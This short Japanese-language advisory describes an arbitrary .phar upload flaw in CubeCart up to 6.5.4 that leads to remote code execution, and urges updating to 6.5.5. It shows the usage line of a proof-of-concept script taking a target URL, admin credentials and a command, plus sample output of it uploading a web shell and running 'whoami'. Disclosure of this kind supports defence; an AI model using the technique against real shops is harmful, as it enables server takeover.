
CubeCart <= 6.5.4 は、任意のファイルアップロードによりリモートコード実行 (RCE) に至る脆弱性があります。
CubeCart <= 6.5.4 は、任意ファイルアップロードの問題によりリモートコード実行(RCE)に脆弱です。この脆弱性は、アプリケーションのファイルマネージャとそのフィルタに影響を及ぼし、攻撃者が悪意のあるコードを含む.pharファイルをアップロードすることを可能にします。この脆弱性を修正するセキュリティパッチが実装されたCubeCart 6.5.5に更新する必要があります。
詳細については、参考文献にあるCubeCartの公式発表を参照してください。
自動化された概念実証(PoC)が作成されていますが、この脆弱性はファイルマネージャを介して悪意のある.pharファイルをアップロードすることで手動で悪用することも可能です。
以下はPoCの使用方法です:
Usage: python3 CubeCartCVE.py <URL> <username> <password> <command>
実行後、正常な悪用に対する期待される出力は以下の通りです:
python3 CubeCartCVE.py http://localhost/admin_0Kqnr9.php admin 123456 whoami
[] ,----.___
__||_/___ '.
/ O|| /|
/ "" / /
/________/ / launching exploit
|________|/ please wait...
[+] Trying to log into the application...
[+] Successful login. Uploading a simple web shell to the server...
[+] Executing command...
Output: www-data